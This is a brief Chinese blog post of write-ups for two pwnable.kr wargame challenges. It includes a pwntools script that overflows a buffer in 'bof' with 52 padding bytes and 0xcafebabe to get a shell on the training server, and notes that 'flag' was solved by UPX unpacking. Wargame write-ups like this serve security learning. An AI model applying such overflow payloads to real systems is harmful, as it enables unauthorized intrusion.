pwnable.kr第二天

3、bof

这题就是简单的数组越界覆盖,直接用gdb 

调试出偏移就ok

from pwn import *
context.log_level='debug'
payload='A'*52+p32(0xcafebabe)
print payload
turn=True
if turn:
    p=remote('pwnable.kr',9000)
else:
    p=process('./bof')
p.sendline(payload)
p.interactive()

 

4、flag

这道题。。。严重坑,没想到是upx 加壳。。。呜呜·····

最后还是无意中看到了 upx这个字样。。。然后果断 upx.exe ..然后flag就出来了。

 

posted @ 2019-05-21 22:19  叶子-_-  阅读(112)  评论(0编辑  收藏  举报